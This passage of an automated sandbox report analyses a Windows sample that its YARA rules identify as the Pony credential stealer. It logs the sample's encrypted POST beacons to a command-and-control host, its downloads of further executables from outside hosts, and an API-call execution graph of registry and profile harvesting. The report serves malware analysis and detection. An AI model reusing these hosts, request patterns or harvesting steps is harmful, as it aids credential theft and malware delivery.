                                              Dec 7, 2024 18:27:26.360110044 CET176OUTData Raw: 43 52 59 50 54 45 44 30 94 8e 01 19 a5 3f 45 d2 93 2b 1d ab 70 58 ca 51 c0 c0 aa 4d ff e4 1f a0 d5 69 d6 86 b8 18 66 78 98 c3 11 91 46 85 68 36 5a 43 0f d4 dc ed 14 32 f0 2e 42 eb dc 1a da 69 42 39 e5 67 42 98 0d 6b c0 b6 7a 05 dc cf 9a c2 04 ff
                                              Data Ascii: CRYPTED0?E+pXQMifxFh6ZC2.BiB9gBkzfZ&\rZ=d8pVA7''Z1)'%]U2g,a[B>}O?wo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.449741208.91.197.44806516C:\Users\user\Desktop\8WgZHDQckx.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 7, 2024 18:27:32.538707018 CET276OUTPOST /forum/viewtopic.php HTTP/1.0
                                              Host: 6.magicalomaha.co
                                              Accept: */*
                                              Accept-Encoding: identity, *;q=0
                                              Content-Length: 176
                                              Connection: close
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
                                              Dec 7, 2024 18:27:32.658251047 CET176OUTData Raw: 43 52 59 50 54 45 44 30 94 8e 01 19 a5 3f 45 d2 93 2b 1d ab 70 58 ca 51 c0 c0 aa 4d ff e4 1f a0 d5 69 d6 86 b8 18 66 78 98 c3 11 91 46 85 68 36 5a 43 0f d4 dc ed 14 32 f0 2e 42 eb dc 1a da 69 42 39 e5 67 42 98 0d 6b c0 b6 7a 05 dc cf 9a c2 04 ff
                                              Data Ascii: CRYPTED0?E+pXQMifxFh6ZC2.BiB9gBkzfZ&\rZ=d8pVA7''Z1)'%]U2g,a[B>}O?wo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.449742208.91.197.44806516C:\Users\user\Desktop\8WgZHDQckx.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 7, 2024 18:27:38.834505081 CET276OUTPOST /forum/viewtopic.php HTTP/1.0
                                              Host: 6.magicalomaha.co
                                              Accept: */*
                                              Accept-Encoding: identity, *;q=0
                                              Content-Length: 176
                                              Connection: close
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
                                              Dec 7, 2024 18:27:38.955339909 CET176OUTData Raw: 43 52 59 50 54 45 44 30 94 8e 01 19 a5 3f 45 d2 93 2b 1d ab 70 58 ca 51 c0 c0 aa 4d ff e4 1f a0 d5 69 d6 86 b8 18 66 78 98 c3 11 91 46 85 68 36 5a 43 0f d4 dc ed 14 32 f0 2e 42 eb dc 1a da 69 42 39 e5 67 42 98 0d 6b c0 b6 7a 05 dc cf 9a c2 04 ff
                                              Data Ascii: CRYPTED0?E+pXQMifxFh6ZC2.BiB9gBkzfZ&\rZ=d8pVA7''Z1)'%]U2g,a[B>}O?wo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.449743208.91.197.44806516C:\Users\user\Desktop\8WgZHDQckx.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 7, 2024 18:27:45.131195068 CET276OUTPOST /forum/viewtopic.php HTTP/1.0
                                              Host: 6.magicalomaha.co
                                              Accept: */*
                                              Accept-Encoding: identity, *;q=0
                                              Content-Length: 176
                                              Connection: close
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
                                              Dec 7, 2024 18:27:45.250772953 CET176OUTData Raw: 43 52 59 50 54 45 44 30 94 8e 01 19 a5 3f 45 d2 93 2b 1d ab 70 58 ca 51 c0 c0 aa 4d ff e4 1f a0 d5 69 d6 86 b8 18 66 78 98 c3 11 91 46 85 68 36 5a 43 0f d4 dc ed 14 32 f0 2e 42 eb dc 1a da 69 42 39 e5 67 42 98 0d 6b c0 b6 7a 05 dc cf 9a c2 04 ff
                                              Data Ascii: CRYPTED0?E+pXQMifxFh6ZC2.BiB9gBkzfZ&\rZ=d8pVA7''Z1)'%]U2g,a[B>}O?wo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              8192.168.2.449744208.91.197.44806516C:\Users\user\Desktop\8WgZHDQckx.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 7, 2024 18:27:51.412682056 CET276OUTPOST /forum/viewtopic.php HTTP/1.0
                                              Host: 6.magicalomaha.co
                                              Accept: */*
                                              Accept-Encoding: identity, *;q=0
                                              Content-Length: 176
                                              Connection: close
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
                                              Dec 7, 2024 18:27:51.533770084 CET176OUTData Raw: 43 52 59 50 54 45 44 30 94 8e 01 19 a5 3f 45 d2 93 2b 1d ab 70 58 ca 51 c0 c0 aa 4d ff e4 1f a0 d5 69 d6 86 b8 18 66 78 98 c3 11 91 46 85 68 36 5a 43 0f d4 dc ed 14 32 f0 2e 42 eb dc 1a da 69 42 39 e5 67 42 98 0d 6b c0 b6 7a 05 dc cf 9a c2 04 ff
                                              Data Ascii: CRYPTED0?E+pXQMifxFh6ZC2.BiB9gBkzfZ&\rZ=d8pVA7''Z1)'%]U2g,a[B>}O?wo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              9192.168.2.449746208.91.197.44806516C:\Users\user\Desktop\8WgZHDQckx.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 7, 2024 18:27:58.193068981 CET276OUTPOST /forum/viewtopic.php HTTP/1.0
                                              Host: 6.magicalomaha.co
                                              Accept: */*
                                              Accept-Encoding: identity, *;q=0
                                              Content-Length: 176
                                              Connection: close
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
                                              Dec 7, 2024 18:27:58.807048082 CET176OUTData Raw: 43 52 59 50 54 45 44 30 94 8e 01 19 a5 3f 45 d2 93 2b 1d ab 70 58 ca 51 c0 c0 aa 4d ff e4 1f a0 d5 69 d6 86 b8 18 66 78 98 c3 11 91 46 85 68 36 5a 43 0f d4 dc ed 14 32 f0 2e 42 eb dc 1a da 69 42 39 e5 67 42 98 0d 6b c0 b6 7a 05 dc cf 9a c2 04 ff
                                              Data Ascii: CRYPTED0?E+pXQMifxFh6ZC2.BiB9gBkzfZ&\rZ=d8pVA7''Z1)'%]U2g,a[B>}O?wo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              10192.168.2.449758208.91.197.44806516C:\Users\user\Desktop\8WgZHDQckx.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 7, 2024 18:28:04.978049994 CET276OUTPOST /forum/viewtopic.php HTTP/1.0
                                              Host: 6.magicalomaha.co
                                              Accept: */*
                                              Accept-Encoding: identity, *;q=0
                                              Content-Length: 176
                                              Connection: close
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
                                              Dec 7, 2024 18:28:05.098192930 CET176OUTData Raw: 43 52 59 50 54 45 44 30 94 8e 01 19 a5 3f 45 d2 93 2b 1d ab 70 58 ca 51 c0 c0 aa 4d ff e4 1f a0 d5 69 d6 86 b8 18 66 78 98 c3 11 91 46 85 68 36 5a 43 0f d4 dc ed 14 32 f0 2e 42 eb dc 1a da 69 42 39 e5 67 42 98 0d 6b c0 b6 7a 05 dc cf 9a c2 04 ff
                                              Data Ascii: CRYPTED0?E+pXQMifxFh6ZC2.BiB9gBkzfZ&\rZ=d8pVA7''Z1)'%]U2g,a[B>}O?wo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              11192.168.2.449877104.21.17.37806516C:\Users\user\Desktop\8WgZHDQckx.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 7, 2024 18:28:58.467014074 CET176OUTGET /4XM2f.exe HTTP/1.0
                                              Host: dynamotouren.de
                                              Accept: */*
                                              Accept-Encoding: identity, *;q=0
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
                                              Dec 7, 2024 18:28:59.592813969 CET1059INHTTP/1.1 301 Moved Permanently
                                              Date: Sat, 07 Dec 2024 17:28:59 GMT
                                              Content-Type: text/html
                                              Content-Length: 167
                                              Connection: close
                                              Cache-Control: max-age=3600
                                              Expires: Sat, 07 Dec 2024 18:28:59 GMT
                                              Location: https://www.dynamotouren.com/?dynamotouren.de
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d1H4IyceFybx1Kdg4uYpOdK2mqdUS2C4wmFyRepL7lQB07Cu4pisK0Wa2Nc5tNCbj0xxiIkxUUZy2MOZmECPKEEYVjqYarD2AQABuYXY6%2BD3X%2FZGLWZ2jV2hz3%2BvXEJW4jo%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Vary: Accept-Encoding
                                              Server: cloudflare
                                              CF-RAY: 8ee63c3b3e19c340-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              server-timing: cfL4;desc="?proto=TCP&rtt=1984&min_rtt=1984&rtt_var=992&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=176&delivery_rate=0&cwnd=132&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              12192.168.2.449881188.114.97.64436516C:\Users\user\Desktop\8WgZHDQckx.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 7, 2024 18:28:59.934055090 CET188OUTGET /?dynamotouren.de HTTP/1.0
                                              Host: www.dynamotouren.com
                                              Accept: */*
                                              Accept-Encoding: identity, *;q=0
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              13192.168.2.44988372.32.185.12806516C:\Users\user\Desktop\8WgZHDQckx.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 7, 2024 18:29:00.470936060 CET173OUTGET /rd7nr.exe HTTP/1.0
                                              Host: 72.32.185.12
                                              Accept: */*
                                              Accept-Encoding: identity, *;q=0
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)


                                              Click to jump to process

                                              Click to jump to process

                                              Click to dive into process behavior distribution

                                              Target ID:0
                                              Start time:12:26:58
                                              Start date:07/12/2024
                                              Path:C:\Users\user\Desktop\8WgZHDQckx.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\8WgZHDQckx.exe"
                                              Imagebase:0x400000
                                              File size:381'552 bytes
                                              MD5 hash:2FBFC79462B64751C339F0B0297C748F
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Pony, Description: Yara detected Pony, Source: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Pony_d5516fe8, Description: unknown, Source: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmp, Author: unknown
                                              • Rule: pony, Description: Identify Pony, Source: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmp, Author: Brian Wallace @botnet_hunter
                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Pony, Description: Yara detected Pony, Source: 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Pony_d5516fe8, Description: unknown, Source: 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                              • Rule: pony, Description: Identify Pony, Source: 00000000.00000002.2922726803.000000000092B000.00000004.00000020.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Pony, Description: Yara detected Pony, Source: 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Pony_d5516fe8, Description: unknown, Source: 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                              • Rule: pony, Description: Identify Pony, Source: 00000000.00000002.2922536092.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                              Reputation:low
                                              Has exited:false

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:29.4%
                                                Dynamic/Decrypted Code Coverage:25.2%
                                                Signature Coverage:12.2%
                                                Total number of Nodes:2000
                                                Total number of Limit Nodes:39
                                                execution_graph 11509 40100f CreateStreamOnHGlobal 8176 40f950 8177 40f958 8176->8177 8180 40f731 8177->8180 8179 40f97e 8181 40f742 8180->8181 8182 40f743 GetPEB 8180->8182 8181->8179 8185 40f765 8182->8185 8183 40f833 8183->8179 8185->8183 8267 402251 8185->8267 8271 40cdc6 8185->8271 8281 405d45 8185->8281 8287 4073c3 8185->8287 8293 409d42 8185->8293 8301 40d5c1 8185->8301 8305 406ec0 8185->8305 8347 409c05 8185->8347 8362 4074bf 8185->8362 8372 40eebe 8185->8372 8386 40443e 8185->8386 8412 40ae3d 8185->8412 8416 409cbb 8185->8416 8424 4078b9 8185->8424 8444 40c7b5 8185->8444 8454 40e732 8185->8454 8480 40542e 8185->8480 8520 40e42a 8185->8520 8524 40c02a 8185->8524 8528 407ca3 8185->8528 8538 40c99f 8185->8538 8552 40649f 8185->8552 8556 406b1d 8185->8556 8560 40681c 8185->8560 8572 40c51b 8185->8572 8580 40691a 8185->8580 8584 40ca19 8185->8584 8588 407198 8185->8588 8594 40c117 8185->8594 8598 40c594 8185->8598 8606 404a92 8185->8606 8678 40a091 8185->8678 8684 40758e 8185->8684 8692 40dd8d 8185->8692 8702 40768d 8185->8702 8716 40620d 8185->8716 8720 40590c 8185->8720 8754 404e8c 8185->8754 8782 405f8c 8185->8782 8794 407d0b 8185->8794 8798 405b0b 8185->8798 8836 405c8a 8185->8836 8844 408d89 8185->8844 8856 40da09 8185->8856 8862 40d185 8185->8862 8872 409edc 8185->8872 8885 40c884 8185->8885 8908 405204 8185->8908 8935 409b7e 8185->8935 8943 408a7d 8185->8943 8976 40e6fc 8185->8976 8980 409ffc 8185->8980 8990 40c179 8185->8990 8994 40e3f9 8185->8994 8998 40bff9 8185->8998 9002 40def8 8185->9002 9006 40e274 8185->9006 9016 40e96e 8185->9016 9024 40f56b 8185->9024 9050 40d1e9 8185->9050 9072 40c0e6 8185->9072 9076 40e2e2 8185->9076 9080 4067e1 8185->9080 9084 407f5e 8185->9084 9090 409e50 8185->9090 9104 40c05b 8185->9104 9116 407c5a 8185->9116 9122 40ecd9 8185->9122 9128 408e59 8185->9128 9136 406756 8185->9136 9146 40a056 8185->9146 9150 4048d6 8185->9150 9164 40a8d3 8185->9164 9172 40da52 8185->9172 9176 409dc9 8185->9176 9184 406b4e 8185->9184 9188 40c64e 8185->9188 9219 40d7cc 8185->9219 9229 40f64a 8185->9229 9241 40dcc6 8185->9241 9247 40c148 8185->9247 9251 40e6c6 8185->9251 8268 40225a 8267->8268 8269 402266 8268->8269 9255 4018a0 8268->9255 8269->8185 8272 40cdd8 8271->8272 9258 40cb05 8272->9258 8277 40ce0c 8277->8185 8280 4018a0 LocalFree 8280->8277 8282 405d57 8281->8282 9533 405ccc 8282->9533 8285 405ccc 35 API calls 8288 4073d5 8287->8288 9576 4071e1 RegOpenKeyA 8288->9576 8291 4071e1 14 API calls 8292 4073fd 8291->8292 8292->8185 9587 4015d8 8293->9587 8295 409d57 GetCurrentDirectoryA 9589 409a76 StrStrIA 8295->9589 8298 409a76 83 API calls 8299 409dae SetCurrentDirectoryA 8298->8299 8300 409dc5 8299->8300 8300->8185 8302 40d5d3 8301->8302 9813 40d3eb RegOpenKeyA 8302->9813 8304 40d5e3 8304->8185 8306 406ed2 8305->8306 9824 406b89 RegOpenKeyA 8306->9824 8309 401bb8 6 API calls 8310 406ef9 8309->8310 8311 406f17 8310->8311 8313 401c93 6 API calls 8310->8313 8312 401cf8 7 API calls 8311->8312 8314 406f1e 8312->8314 8315 406f08 8313->8315 8317 406f47 8314->8317 8319 401c93 6 API calls 8314->8319 8316 406df5 20 API calls 8315->8316 8318 406f12 8316->8318 8320 401cf8 7 API calls 8317->8320 8322 4018a0 LocalFree 8318->8322 8323 406f2d 8319->8323 8321 406f4e 8320->8321 8324 406f77 8321->8324 8326 401c93 6 API calls 8321->8326 8322->8311 8325 401c93 6 API calls 8323->8325 8327 401cf8 7 API calls 8324->8327 8328 406f38 8325->8328 8329 406f5d 8326->8329 8330 406f7e 8327->8330 9835 406df5 8328->9835 8332 401c93 6 API calls 8329->8332 8333 406fa7 8330->8333 8336 401c93 6 API calls 8330->8336 8335 406f68 8332->8335 8333->8185 8334 406f42 8337 4018a0 LocalFree 8334->8337 8338 406df5 20 API calls 8335->8338 8339 406f8d 8336->8339 8337->8317 8340 406f72 8338->8340 8341 401c93 6 API calls 8339->8341 8343 4018a0 LocalFree 8340->8343 8342 406f98 8341->8342 8343->8324 8348 409c1a 8347->8348 8349 401cf8 7 API calls 8348->8349 8350 409c24 8349->8350 8351 409c4c GetCurrentDirectoryA 8350->8351 8353 401c93 6 API calls 8350->8353 8352 409a76 83 API calls 8351->8352 8355 409c84 8352->8355 8354 409c33 8353->8354 8356 404192 30 API calls 8354->8356 8357 409a76 83 API calls 8355->8357 8358 409c47 8356->8358 8359 409ca0 SetCurrentDirectoryA 8357->8359 8360 4018a0 LocalFree 8358->8360 8361 409cb7 8359->8361 8360->8351 8361->8185 8363 4074d1 8362->8363 9867 40740c RegOpenKeyA 8363->9867 8366 40740c 9 API calls 8367 4074f9 8366->8367 8368 40740c 9 API calls 8367->8368 8369 40750c 8368->8369 8370 40740c 9 API calls 8369->8370 8371 40751e 8370->8371 8371->8185 8373 40eed0 8372->8373 8374 4041dd 35 API calls 8373->8374 8375 40eeea 8374->8375 8376 4041dd 35 API calls 8375->8376 8377 40ef01 8376->8377 8378 4041dd 35 API calls 8377->8378 8379 40ef18 8378->8379 8380 4041dd 35 API calls 8379->8380 8381 40ef2f 8380->8381 9875 40ed97 8381->9875 8387 404455 8386->8387 8388 404476 GetVersionExA 8387->8388 8389 404498 8388->8389 9916 4042ab GetModuleHandleA 8389->9916 8391 4044de 9922 4018b7 LocalAlloc 8391->9922 8393 4044f1 GetLocaleInfoA 9923 401587 8393->9923 8395 404520 GetLocaleInfoA 8396 404549 8395->8396 9925 404313 8396->9925 8398 40454e 9933 4043ad 8398->9933 8413 40ae4f 8412->8413 9993 40ad02 RegOpenKeyA 8413->9993 8415 40ae5f 8415->8185 8417 4015d8 8416->8417 8418 409cd0 GetCurrentDirectoryA 8417->8418 8419 409a76 83 API calls 8418->8419 8420 409d0b 8419->8420 8421 409a76 83 API calls 8420->8421 8422 409d27 SetCurrentDirectoryA 8421->8422 8423 409d3e 8422->8423 8423->8185 8439 4078cd 8424->8439 8425 4079a0 10081 40786d 8425->10081 8426 4078e5 StrStrA 8428 407942 StrStrIA 8426->8428 8426->8439 8428->8439 8430 4078fe lstrlenA 8433 402272 9 API calls 8430->8433 8431 40786d 35 API calls 8434 4079b4 8431->8434 8432 402272 9 API calls 8432->8439 8433->8439 8435 40786d 35 API calls 8434->8435 8437 4079be 8435->8437 8436 404192 30 API calls 8436->8439 10092 407702 RegOpenKeyA 8437->10092 8439->8425 8439->8426 8439->8430 8439->8432 8439->8436 8441 4018a0 LocalFree 8439->8441 8441->8439 8442 407702 37 API calls 8443 4079e3 8442->8443 8443->8185 8445 40c7c7 8444->8445 8446 401bb8 6 API calls 8445->8446 8447 40c7dd 8446->8447 8448 40c804 8447->8448 8449 402272 9 API calls 8447->8449 8448->8185 8450 40c7e7 8449->8450 8450->8448 8451 404192 30 API calls 8450->8451 8452 40c7ff 8451->8452 8453 4018a0 LocalFree 8452->8453 8453->8448 8455 40e744 8454->8455 8456 401bb8 6 API calls 8455->8456 8457 40e75e 8456->8457 8458 40e77b 8457->8458 8459 404192 30 API calls 8457->8459 8460 401bb8 6 API calls 8458->8460 8461 40e776 8459->8461 8462 40e791 8460->8462 8463 4018a0 LocalFree 8461->8463 8464 40e7ae 8462->8464 8465 404192 30 API calls 8462->8465 8463->8458 8466 401bb8 6 API calls 8464->8466 8467 40e7a9 8465->8467 8468 40e7c5 8466->8468 8469 4018a0 LocalFree 8467->8469 8470 40e7e2 8468->8470 8472 404192 30 API calls 8468->8472 8469->8464 8471 401bb8 6 API calls 8470->8471 8473 40e7f8 8471->8473 8474 40e7dd 8472->8474 8476 40e815 8473->8476 8477 404192 30 API calls 8473->8477 8475 4018a0 LocalFree 8474->8475 8475->8470 8476->8185 8478 40e810 8477->8478 8479 4018a0 LocalFree 8478->8479 8479->8476 8481 405440 8480->8481 10103 405309 8481->10103 8484 405309 24 API calls 8485 405473 8484->8485 8486 405309 24 API calls 8485->8486 8487 40548b 8486->8487 8488 405309 24 API calls 8487->8488 8489 4054a3 8488->8489 8490 405309 24 API calls 8489->8490 8491 4054bb 8490->8491 8492 405309 24 API calls 8491->8492 8493 4054d3 8492->8493 8494 405309 24 API calls 8493->8494 8495 4054eb 8494->8495 8496 405309 24 API calls 8495->8496 8521 40e43c 8520->8521 8522 4041dd 35 API calls 8521->8522 8523 40e456 8522->8523 8523->8185 8525 40c03c 8524->8525 10150 40bf68 8525->10150 8527 40c04c 8527->8185 8529 4015d8 8528->8529 8530 407cb8 GetWindowsDirectoryA 8529->8530 8531 407cd0 8530->8531 8532 407cfc 8530->8532 8531->8532 8533 401c3f 5 API calls 8531->8533 8532->8185 8534 407ce8 8533->8534 8535 403ead 16 API calls 8534->8535 8536 407cf7 8535->8536 8537 4018a0 LocalFree 8536->8537 8537->8532 8539 40c9b1 8538->8539 8540 401bb8 6 API calls 8539->8540 8541 40c9c7 8540->8541 8542 40ca0a 8541->8542 8543 40c9cb StrStrIA 8541->8543 8542->8185 8544 40ca02 8543->8544 8545 40c9df 8543->8545 8547 4018a0 LocalFree 8544->8547 8546 402272 9 API calls 8545->8546 8548 40c9e7 8546->8548 8547->8542 8549 403fe7 30 API calls 8548->8549 8550 40c9fd 8549->8550 8551 4018a0 LocalFree 8550->8551 8551->8544 8553 4064b1 8552->8553 10172 40623e RegOpenKeyA 8553->10172 8555 4064c1 8555->8185 8557 406b2f 8556->8557 10183 406955 RegOpenKeyA 8557->10183 8559 406b3f 8559->8185 8561 40682e 8560->8561 8562 4041dd 35 API calls 8561->8562 8563 406848 8562->8563 8564 401bb8 6 API calls 8563->8564 8565 40685f 8564->8565 8566 406887 8565->8566 8567 401c93 6 API calls 8565->8567 8566->8185 8568 40686e 8567->8568 8569 404192 30 API calls 8568->8569 8570 406882 8569->8570 8571 4018a0 LocalFree 8570->8571 8571->8566 8573 40c52d 8572->8573 10193 40c4aa 8573->10193 8576 40c4aa 35 API calls 8577 40c544 8576->8577 8578 40c4aa 35 API calls 8577->8578 8579 40c54e 8578->8579 8579->8185 8581 40692c 8580->8581 8582 4041dd 35 API calls 8581->8582 8583 406946 8582->8583 8583->8185 8585 40ca2b 8584->8585 8586 4041dd 35 API calls 8585->8586 8587 40ca45 8586->8587 8587->8185 8589 4071aa 8588->8589 10210 406fb6 RegOpenKeyA 8589->10210 8592 406fb6 14 API calls 8593 4071d2 8592->8593 8593->8185 8595 40c129 8594->8595 8596 40bf68 35 API calls 8595->8596 8597 40c139 8596->8597 8597->8185 8599 40c5a6 8598->8599 10221 40c55d 8599->10221 8602 40c55d 35 API calls 8603 40c5bd 8602->8603 8604 40c55d 35 API calls 8603->8604 8605 40c5c7 8604->8605 8605->8185 8607 404aa4 8606->8607 10230 4018b7 LocalAlloc 8607->10230 8609 404ab1 GetWindowsDirectoryA 8610 404ac5 8609->8610 8611 404ad9 8609->8611 8610->8611 8612 404acc 8610->8612 8613 4018a0 LocalFree 8611->8613 10231 40495f 8612->10231 8615 404ad7 8613->8615 8616 401cf8 7 API calls 8615->8616 8617 404ae8 8616->8617 8618 40495f 28 API calls 8617->8618 8619 404af1 8618->8619 8620 401cf8 7 API calls 8619->8620 8621 404af8 8620->8621 8622 404b10 8621->8622 8624 401c93 6 API calls 8621->8624 8623 401cf8 7 API calls 8622->8623 8626 404b17 8623->8626 8625 404b07 8624->8625 8627 40495f 28 API calls 8625->8627 8628 404b2f 8626->8628 8629 401c93 6 API calls 8626->8629 8627->8622 8630 401cf8 7 API calls 8628->8630 8631 404b26 8629->8631 8632 404b36 8630->8632 8633 40495f 28 API calls 8631->8633 8633->8628 8679 40a0a3 8678->8679 8680 4041dd 35 API calls 8679->8680 8681 40a0bd 8680->8681 8682 4041dd 35 API calls 8681->8682 8683 40a0d4 8682->8683 8683->8185 8685 4075a0 8684->8685 10286 40752d 8685->10286 8688 40752d 35 API calls 8689 4075b7 8688->8689 8690 40752d 35 API calls 8689->8690 8691 4075c1 8690->8691 8691->8185 8693 40dd9f 8692->8693 8694 401bb8 6 API calls 8693->8694 8696 40ddb9 8694->8696 8695 40ddd6 8698 4041dd 35 API calls 8695->8698 8696->8695 8697 404192 30 API calls 8696->8697 8699 40ddd1 8697->8699 8700 40dded 8698->8700 8701 4018a0 LocalFree 8699->8701 8700->8185 8701->8695 8703 40769f 8702->8703 10299 4075d0 8703->10299 8706 4075d0 29 API calls 8707 4076ba 8706->8707 8708 4075d0 29 API calls 8707->8708 8709 4076c6 8708->8709 8710 4075d0 29 API calls 8709->8710 8711 4076d5 8710->8711 8712 4075d0 29 API calls 8711->8712 8713 4076e4 8712->8713 8714 4075d0 29 API calls 8713->8714 8715 4076f3 8714->8715 8715->8185 8717 40621f 8716->8717 10330 406025 RegOpenKeyA 8717->10330 8719 40622f 8719->8185 8721 40591e 8720->8721 10341 4057e5 8721->10341 8755 4015d8 8754->8755 8756 404ea1 GetWindowsDirectoryA 8755->8756 8757 404f60 8756->8757 8758 404ebd 8756->8758 8759 401cf8 7 API calls 8757->8759 8758->8757 8761 401c3f 5 API calls 8758->8761 8760 404f67 8759->8760 8763 404f87 8760->8763 8767 401c93 6 API calls 8760->8767 8762 404ed9 GetPrivateProfileStringA 8761->8762 8764 404f09 8762->8764 8765 404f1a GetPrivateProfileStringA 8762->8765 10449 404e40 8763->10449 8768 404cb4 31 API calls 8764->8768 8770 404f44 8765->8770 8771 404f55 8765->8771 8772 404f76 8767->8772 8768->8765 8774 404cb4 31 API calls 8770->8774 8775 4018a0 LocalFree 8771->8775 10421 404cb4 8772->10421 8773 404e40 36 API calls 8777 404fa5 8773->8777 8774->8771 8775->8757 8780 404e40 36 API calls 8777->8780 8779 4018a0 LocalFree 8779->8763 8781 404fb4 8780->8781 8781->8185 8783 405f9e 8782->8783 8784 401bb8 6 API calls 8783->8784 8787 405fba 8784->8787 8785 405fd5 8786 401bb8 6 API calls 8785->8786 8791 405fee 8786->8791 8787->8785 8788 4018a0 LocalFree 8787->8788 8788->8785 8789 406009 10463 405d8d RegOpenKeyA 8789->10463 8791->8789 8793 4018a0 LocalFree 8791->8793 8792 406016 8792->8185 8793->8789 8795 407d1d 8794->8795 8796 4041dd 35 API calls 8795->8796 8797 407d37 8796->8797 8797->8185 8799 405b1d 8798->8799 8800 401bb8 6 API calls 8799->8800 8801 405b37 8800->8801 8802 405b4f 8801->8802 8803 403ead 16 API calls 8801->8803 8804 401bb8 6 API calls 8802->8804 8805 405b4a 8803->8805 8806 405b66 8804->8806 8807 4018a0 LocalFree 8805->8807 8808 405b7e 8806->8808 8809 403ead 16 API calls 8806->8809 8807->8802 8810 401bb8 6 API calls 8808->8810 8811 405b79 8809->8811 8812 405b95 8810->8812 8813 4018a0 LocalFree 8811->8813 8814 405ba8 8812->8814 10482 405aad 8812->10482 8813->8808 8816 401bb8 6 API calls 8814->8816 8818 405bbf 8816->8818 8820 405bd2 8818->8820 8821 405aad 30 API calls 8818->8821 8819 4018a0 LocalFree 8819->8814 8822 401bb8 6 API calls 